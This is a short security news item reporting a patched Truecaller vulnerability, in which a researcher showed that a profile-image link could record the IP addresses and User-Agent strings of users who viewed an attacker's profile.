Researcher Ehraz Ahmed discovered a vulnerability in a popular mobile call blocking application Truecaller. Its operation allows disclosing user data, information about the system and location.
The researcher also published a PoC code demonstrating that a “malicious link” could be set instead of a profile image. A malicious link could be used by an attacker to obtain the IP addresses of other Truecaller users and carry out attacks.
Whenever the user views the attacker’s profile on Truecaller, Either by doing a search or a popup from a call, The custom script gets executed, and the User’s IP gets recorded. And for the user viewing the profile, He won’t notice any difference as the output of this custom script displays an image, so for the user, it will look like any other truecaller profile”, — reports Ehraz Ahmed.
Reference:
Truecaller is a smartphone application, which has features of caller-identification, call-blocking, flash-messaging, call-recording, Chat&Voice which uses the internet. The service requires users to provide a standard cellular mobile number for registering with the service.
The platform is available worldwide, but is especially popular in India, and has more than 500 million downloads and 150 million active users per day.
Read also: Researchers Identified 37 Vulnerabilities in Popular VNC Implementations
During exploitation of the vulnerability, Ahmed managed to obtain user information, such as IP address and User-Agent. The attack is carried out in the background without the knowledge of the user.
Having a user’s IP address, the hacker can carry out attacks such as DDOS, Brute Force And Can, and also can scan open ports for future use”, – writes Ehraz Ahmed.
Recall that this summer, due to an error in the updated version, Truecaller registered users in the payment service without their consent. The application did not request any permissions for such actions from users, but only sent them text notifications about registration.
Solution:
The developers of Truecaller confirmed the presence of this problem and immediately released a patch that fixes the vulnerability. Users are encouraged to verify that their application has been updated to the latest version.
